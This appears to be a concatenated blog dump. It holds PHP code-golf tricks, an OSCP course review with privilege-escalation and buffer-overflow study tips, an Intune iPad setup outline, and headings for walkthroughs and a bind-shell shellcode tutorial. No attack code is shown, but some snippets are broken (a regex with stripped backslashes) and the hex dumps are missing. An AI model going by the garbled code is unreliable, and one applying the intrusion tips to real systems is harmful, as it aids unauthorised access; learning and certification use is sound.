<?=preg_filter(~Ü×ÑÖ£ÎÔÜ?,~ÛÎ,'Aa striing  wiith soomee reeduundaant chaars');

Make sure to set your text editor to latin1 (ISO-8859-1 or Windows-1252) instead of UTF8 otherwise you will save those inverted bytes as multi-bytes which will do the opposite of what we are trying to do here.

Sometimes you can also invert the input to shorten your overall code.

A list of useful inverted characters:

* Tab (char 9) -> ~ö
* Line-feed (char 10) -> ~õ
* Space (char 32) -> ~ß
* '!' (char 33) -> ~Þ
* '"' (char 34) -> ~Ý
* '#' (char 35) -> ~Ü
* '$' (char 36) -> ~Û
* '%' (char 37) -> ~Ú
* '&' (char 38) -> ~Ù
* ''' (char 39) -> ~Ø
* '(' (char 40) -> ~×
* ')' (char 41) -> ~Ö
* '*' (char 42) -> ~Õ
* '+' (char 43) -> ~Ô
* ',' (char 44) -> ~Ó
* '-' (char 45) -> ~Ò
* '.' (char 46) -> ~Ñ
* '/' (char 47) -> ~Ð
* ':' (char 58) -> ~Å
* ';' (char 59) -> ~Ä
* '<' (char 60) -> ~Ã
* '=' (char 61) -> ~Â
* '>' (char 62) -> ~Á
* '?' (char 63) -> ~À
* '[' (char 91) -> ~¤
* '\' (char 92) -> ~£
* ']' (char 93) -> ~¢
* '^' (char 94) -> ~¡
* '_' (char 95) -> ~  (char 160, the fact you are not able to see whitespace doesn't mean that PHP treat is as whitespace!)

Arrays

Unless you’re performing an array manipulation, most references to an array index $a[$i] can be replaced with simply $$i. This is even true if the index is an integer, as integers are valid variable names in PHP (although literals will require brackets, e.g. ${0}).

Example of populating an “array”:

<?for($i=0; $i<10; $i++) $$i = $i*2;

Control Structures

Braces

Know where you need brackets and where you don’t. If a statement is only one line, you don’t need brackets. Compare these two examples that print chars below 1000 that have a “9” in it.

<?for(;++$i<1000;){if(is_int(strpos($i,'9'))){echo$i."\n";}}

<?for(;++$i<1000;)if(is_int(strpos($i,'9')))echo$i."\n";

Multiple statements

Often it happens that you have multiple statements inside an if statement:

<?
if($c%4){
    $q++;
    print$a;
}

You can rewrite this as:

<?if($c%4&&$q++)print$a;

Or even better:

<?if($c%4)$q+=print$a;

Or as optimal as we know it:

<?$c%4?$q+=print$a:0;

This works because print always returns 1.

Loops

Never use while loops. For loops are always at least as short as a while loop, and most of the time shorter. The following code is a not very optimized version of rot13.

<?$a="input";while($a[$i]){$b=ord($a[$i++]);echo chr(($b>109?-13:13)+$b);}

<?for($a="input";$a[$i];print chr(($b>109?-13:13)+$b))$b=ord($a[$i++]);

Try to use as few control structures as possible. Multiple loops can often be folded into a single loop.

Ifs

Try to avoid the use of the traditional if-structure. Most times the same action can be done by using the ternary operator. The next three code-snippets are exactly the same:

<?if($i==2)++$j;

<?$i==2?++$j:0; # Saves one byte.

<?$i-2?:++$j; # Saves another two bytes, available since PHP 5.3

The following code prints the values of pow(3,n), n<10, starting with n=0:

<?for(;$n++<9;)echo$a=3*$a?:1,"\n";

If you do have only an if (and no else), try to negate the condition. Since the middle part of the of ternary operator might be left out.

So:

<?if($a==$b)doSomething();

Equals (Since PHP 5.3>):

<?$a!=$b?:doSomething();

Even equals:

<?$a!=$b||doSomething();

Since the associativity of this operator is left, nested ternary-operators should be preferable done in the true-action, since you otherwise have to use parentheses.

<?$a=2;$b=3;print$a==$b?$a==27?$b!=30?:'This situation will never happen':'':'';

Same code, but false-based:

<?$a=2;$b=3;print$a!=$b?:($a!=27?'':$b!=30)?'':'This situation will never happen';

Compare the examples below that both print all primes below 1000.

1<?for($a=array(),$b=1;++$b<=1000;){foreach($a as$c)if($b%$c==0)continue 2;$a[]=$b;echo"\n".$b;}

1<?for($a=array(),$b=1;++$b<=1000;){foreach($a as$c)continue($b%$c?0:2);$a[]=$b;echo"\n".$b;}

The whole if-structure can here be replaced with a ternary operator. Also try to avoid the need of keywords like ‘break’ and ‘continue’, since they need a lot of bytes, while it even might be done using a variable, that perhaps even might be used for other purposes.

Rewritten without if and continue, although this is far from the optimal solution:

1<?for($a=array(),$b=1;$d=++$b<=1000;){foreach($a as$c)$b%$c?:$d=0;if($d){$a[]=$b;echo"\n".$b;}}

Functions

You should (almost) never write your own functions. In most cases it is unnecessary and it costs a lot of bytes. Some built-in functions in PHP should never be used. These are some examples with a better equivalent to the right.

rtrim -> chop
explode -> split
implode -> join
preg_split -> Could use split() instead in most cases
preg_replace -> preg_filter is one byte shorter,and in most cases exactly the same.
print -> echo

In some cases, print might be useful since it can be used as a function while echo can’t:

<?for(;++$i<11;){echo str_repeat(' ',10-$i);for($a=0;$a<$i;)echo$a,(++$a-$i?' ':"\n");}

<?for(;++$i<11;print"\n")for(print str_pad($a=0,11-$i,' ',0);++$a<$i;)echo" $a"; # echo instead of print would give an error

lcfirst -> $a|' ' or $a|~ß
strtoupper($a) -> if $a is only one char, you can use: $a&ß or $a&'ß'
ucfirst: see strtoupper
echo sprintf(…) -> printf(…)
str_replace -> consider whether strtr can be used
array_unique -> Most times this function is useless. If something has to be unique, you can do it in many different ways dependent on context.

All three examples below shows all unique letters in the string in capitals:

<?$b=array_unique(str_split(strtoupper('This is a string')));sort($b);if($b[0]==' ')unset($b[0]);echo join($b,"\n");

<?for($a='This is a string';$b=$a[$i++];sort($c))@in_array($b&=ß,$c)?:$b==' '?:$c[]=$b;echo join($c,"\n");

<?for($a=count_chars(strtoupper('This is a string'),3);$c=$a[$b++];)$c==' '?:$d[]=$c;echo join($d,"\n");

<?for($a='This is a string';$b=$a[$i++];)$b==' '?:$c[$b&=ß]=$b;sort($c);echo join($c,"\n");

sizeof -> most times unnecessary, if needed use count.
count -> most times unnecessary. See examples below:

<?for($a=array(5,24,89);$i<count($a);)echo$a[+$i++],"\n";

<?for($a=array(5,24,89);$b=$a[+$i++];)echo"$b\n";

floor -> Often can done with (int)$a (If you only want to do echo floor($a); you might consider printf(‘%u’,$a);)
preg_replace and preg_filter does have an e-flag, which means that the replacement is being executed as shown in the example below.

Both solutions below are written by JWvdVeer for the PIG-latin golf challenge:

<?foreach(split(~ß,SENTENCE)as$a)echo($b++?~ß:'').(strpos(' aeuio',$a[0])?$a.w:substr($a,1).$a[0]).ay;

<?=preg_filter('#b(([aioue]w*)|(w)(w*))b#ie','"$2"?"$2way":"$4$3ay"',SENTENCE);

The second solution is much shorter than the first. It even can handle strings with punctuation.

Operators

Precedence

Know the precedence of operators. A table with information about the precedence can be found at: http://php.net/manual/language.operators.precedence.php. This is important. Because then you know when (not) to put parentheses around your piece of code. Try to concatenate operators as often as possible. Set the variables $a, $b, $c to 1, $d to ‘None’ and $e has to be incremented? Then it should be:

<?condition?$e+=$a=$b=$c=1|$d=None:0;

Not:

<?if(condition){++$e;$a=$b=$c=1;$d=None;}

Or incremented $b with $c, then added to $a, and showing whether $a is odd or even after that increment?

<?echo'$a is ',(1&$a+=$b+=$c)?odd:even;

Modulo operator (%)

Modulo is a really useful operator for doing actions that only have to be done once in so many times in a loop or with some given condition. The condition to the loop can be a variable you can use for this purpose.

So if something has to be done every each 9th iteration:

<?for(;$i<100;)++$i%9?:doSomething();>

It is comparable to the bitwise &-operator in the cases that if a%b is given, b is a power of two. In that case it is exactly the same as a&(b-1). So $a%8 is exactly the same as $a&7. Only the precedence of these two operators is different. So use the right one in your context.

Assignment Operators

If possible always try to use +=, -=, %=, &=, |=, etc. Mind the fact is associativity is right. So first the most right assignment operator in the expression will be executed.

Which makes this:

<?$a+=$b%=2;

exactly the same as:

<?$b%=2;$a+=$b;

But not the same as:

<?$a+=$b;$b%=2;

Bitwise

Bitwise XOR (^)

Bitwise XOR for integers is a replacement for !=

Numeric example:

<?$i!=7?:print'$i is seven';

Equals:

<?$i^7?:print'$i is seven';

On strings it might be very useful to determine whether the given character equals a given char. This can be done by XOR the given char to ‘0’, since ‘0’ evaluates false.

Example check whether char equals ‘_’:

<?$c=_;echo'Char is '.($c^o?'not ':'').'an underscore';

This trick only can be used on one char. Since ‘0’ evaluates false, but ‘00…’ evaluates true.

Bitwise OR (|)

Used for several purposes. One of them is converting letters to lowercase (see strtolower and lcfirst in section functions). Mind the fact that $int|$nonNumericString==$int==true. Sometimes this might be useful, because you don’t need a semicolon instead and your code might be written in one expression (for example in a ternary-operator).

Bitwise NOT (~)

Covered in the String section.

Hall of Fame

Below are two of the most impressive work from the public challenges in my opinion. They were submitted in 2012 by the talented primo, whom had the top score on all challenges. The encoding used to calculate the filesize was ISO-8859-1.

Cantor’s Enumeration

Challenge description: Print out the 100 first numbers in Cantor’s Enumeration.

Leading submission with 57 bytes:

<?for($f=µ;$ö++.$µ++-49;--$$f?--$$f:$f^=C)echo"$ö / $µ
";

Shown in hex:

By comparrison, this was the next shortest submission from the user JWvdVeer with 76 bytes:

<?for(;$x++.$y++^49;$b--?${$a%2?x:y}-=2:--${(1&$b=++$a)?y:x})echo"$x / $y
";

Pathing

The challenge description were as follows:

The constant MAP will contain one random map.
Your program should output, to standard out, one single number, the shortest distance from . to X. (alas, how many moves are the absolute minimum to get from the spot marked with ‘.’ to the spot marked with ‘X’)
Do not include the starting position, but include the end position.
The map will always be closed, i.e. they will have a wall that reaches all the way around.
The map are of random size, but no map will be greater than 50*50.
The map may not always be square, but will always be rectangular.
You may only move up, down, left or right. No diagonals.

Example input value (Given in the MAP constant on runtime):

####################################
####################################
####################################
####### ############################
######  .###########################
######   ##############X ###########
#####     ##############  ##########
##### #  ############  ## ##########
#####       #######    #   #########
#######     ##### #      ###########
########  #####           ##########
########   #### ####   #############
########  #  #  ####   #############
########         ###################
#########        ###################
####################################

Example answer: 36

This was the leading submission with only 118 bytes.

<?for(;^$f=$m[strpos($m=~MAP,Ñ)+$c=~($Ü%2*strpos($m,õ))*~-($Ü&2)+$p=$a[$Ü++/5-3]];)${$$f|$$c?z:$a[]=$c}=$$p+1;echo$z;

And as shown in hex:

Offensive Security PWK/OSCP Review

Sat, 03 Mar 2018 00:00:00 +0000

Intro

Aside from an ethical hacking class at the university, I had no other experience with internal network penetration testing before hand, so I was quite fresh when starting at the PWK labs. Over the coarse of about six months I had 90 days of lab time, but real work and personal life took away much of the time, rendering me only with about 30 productive days in the lab.

My methodology doing the PWK lab was to focus 100% on each machine until it was rooted, before going to the next. In the beginning I just started to attack the first machine in the subnet and just followed the IP range naturally, but this soon stopped being possible. This is because the difficulty level does not follow the IP range. After this I started to go for low hanging fruit around the subnet instead. I used about half a day to a day on each machine, except the really easy ones, which took some minutes. This was a concern for me, because I was afraid I would not have enough time to finish enough machines on the exam, with only 24 hours available.

I decided to seek hints from the forums when I was stuck for more than an hour. If you are able to read between the lines among the replies saying “try harder” and “enumerate more”, you can maybe extract an idea that will move you forward. I felt that this was better than using days stuck in the wrong rabbit hole, leading you nowhere, but maybe you would learn more from that, I don’t know. This might be a huge discussion for another day.

I signed up for my first exam 16. of February 2018, which was the first available Friday. The exam started at 0800AM and at 1100AM I had root shell on the buffer overflow machine. I was feeling good and motivated! However, after 12 hours I only had one local shell more to show for. At this point I didn’t see the light in the tunnel. My mindset now was to just do the rest of the exam for fun and learning. Around 0400AM, four hours before deadline, things changed. I was high on caffeine and I was in my ultra focused state of mind, which I get at night time. Programmers are probably familiar with the phenomenon. The machines went down one by one and when the time was up, I only had one 25 point machine left. I was a little frustrated I couldn’t root it, but overall I was happy I had enough points to pass. You are allowed to use Metasploit on one machine, and at this time I hadn’t used it yet, but there was no time left. Instead of going to sleep, I immediately started to go over my notes to improve and supplement them. Better to do this now when the machines are fresh in memory, rather than after waking up.

After about 7 hours of sleep, I started to port my notes and screenshots from KeepNote to LibreOffice Writer. If I would do it again, I would strive to get a copy of Microsoft Word instead, for a more trivial word processor to work with. Uploading the exam and lab report was the worst part. Offensive Security are very strict about the formating. They state that they will fail you are not compliant with their policy. So after checking everything ten times I finally uploaded it.

On Monday morning an email from OffSec popped up on my phone. I was not expecting an answer this early, since it stated it would take up to three business days.

Dear Daniel,

We are happy to inform you that you have successfully completed the Penetration Testing with Kali Linux certification exam and have obtained your Offensive Security Certified Professional (OSCP) certification.

That message was a relief and a perfect way to start the week.

Review

I was overall very happy with the PWK course. It was an amazing learning experience. It was indeed very hard and challenging, but also very fun. You are not only learning about technical penetration testing and methodology, but you’ll get a better understanding about computers and networks in general.

The videos in the course material is of the highest quality, and above everything you will find on YouTube. The exercises that comes in the PDF is part of my biggest complaint about the course and the exam. You get 5 extra points if you write a report for at least ten lab machines and answering all the lab exercises. First off, I think the exam should be totally independent and not grant extra points for doing other things. One could just have copied someone else’s report and answers to get 5 free points, or did it themselves with infinite amount of time. It doesn’t prove anything. The only good thing about following the exercises is that it will guide you to low hanging fruits in the lab. It is also a fine starting place if you are a complete beginner, but when people can get 5 points for free, no matter the skill level, they will probably do it. And doing the exercises while you have precious lab does not feel great. Some of the exercises are good, but others feels like a waste of time and backwards to do.

The pricing of the course is a great part about it. It’s only $800 for 30 days lab time, course material and exam attempt. This makes it much easier for hobby pentesters to take the certification without the backing of the company they do not work for yet. Instead of partaking in one SANS course, you can actually take all the online Offsec courses (PWK, CTP and WiFu) and still have a lot of money left. These certifications never expire, does actually prove something, are highly respected and recognized, compared to a SANS certification.

Resources, tips and tricks

For Linux privilege escalation I would strongly recommend using linuxprivchecker.py. Upload it to after you have initial local shell on a Linux host. Read the output carefully, but don’t always trust the exploit suggestions at the bottom. Use Google instead.

Windows privilege escalation is a little different. There are tools like linuxprivchecker.py for Windows also, but I never had any success running them. But all you really ever need are found on the following links:

You will need to be able to build basic buffer overflow exploits yourself. The lab exercises are great resources for this. Besides that, I strongly recommend that you grab a Windows 7 machine from Microsoft and try dostackbufferoverflowgood. Write an exploit yourself and look at the walkthrough afterwards. It will teach your tricks PWK didn’t.

If I would go into the lab again now, I would try out Pillage to save time on the initial enumeration phase. I haven’t tried it much myself, so I can’t guarantee its quality, but I think it’s worth testing.

The course suggests using KeepNote, that ships with Kali, to document the lab machines, but the project seems dead, and has not been updated since 2012. I would look into CherryTree or Evernote if I would take the course again.

An important thing to remember is to always revert a machine before you start on it. I have been burned by this many times and wasted so much time.

I would recommend hanging around on the IRC channel with the other students. You are not allowed to discuss lab machines, but you can discuss the course in general and mingle about other things.

Lastly, read the documentation around the PWK course and the OSCP exam in great detail.

Daniel Solstad

Setup and Manage iPads in Intune

Setup and Enrollment

1. Apple Business Manager - Enrolling

2. Intune - MDM Push Certificate

3. Intune - Enrollment Program Token

4. Apple Business Manager - Setting up MDM

5. Intune - Enrollment Profile

6. Apple Configurator - Prepare

7. iPad - Setup

8. Apple Business Manager - Verify

9. Apple Business Manager - Change MDM

10. Intune - Assign Profile

11. Apple Configurator - Prepare again

12. Intune - Verify

Groups

Intune - Create Group and Assign Device

Apps

Apple Business Manager - VPP Token

Intune - VPP Token

Apple Business Manager - Purchase Apps

Intune - Apps

Forced Configurations

Intune - Chose Rules

Offensive Security AWAE/OSWE Review

Complaints

Exam

Tips

A collection of my favorite logical puzzles

Blue Eyes

The King and his Servants

Three Guys at the Hotel

The Blind Man with the Pills

The Mountain Climber

Variable Swapping

The Brothers

Squares

5+5+5=550

The Man and the Window

Walkthrough of Leopold

Intro

Enumeration

Setting up Man-in-the-middle

Initial Access

Priv Esc

Summary

Walkthrough of Alphonse

Intro

Prep

Enumeration

nmap

enum4linux

Web server

FTP

Disecting the APK

Understanding the API

Out-of-bound XSS

Proxy via XSS

Command execution

Priv Esc

Summary

The Rorschach Test of Information Security

Decentralized system

Centralized system

Tutorial - Writing Hardcoded Windows Shellcodes (32bit)

Prework: Finding system calls, DLLs and addresses

Shellcoding in general

Building the bindshell (port 4444)

System call: LoadLibraryA

System call: WSAStartup

System call: WSASocketA

System call: bind

System call: listen

System call: accept

System call: SetStdHandle

System call: system

This is the stack and registers for each operation:

The complete bind shell code

Compilation

Verify standalone executable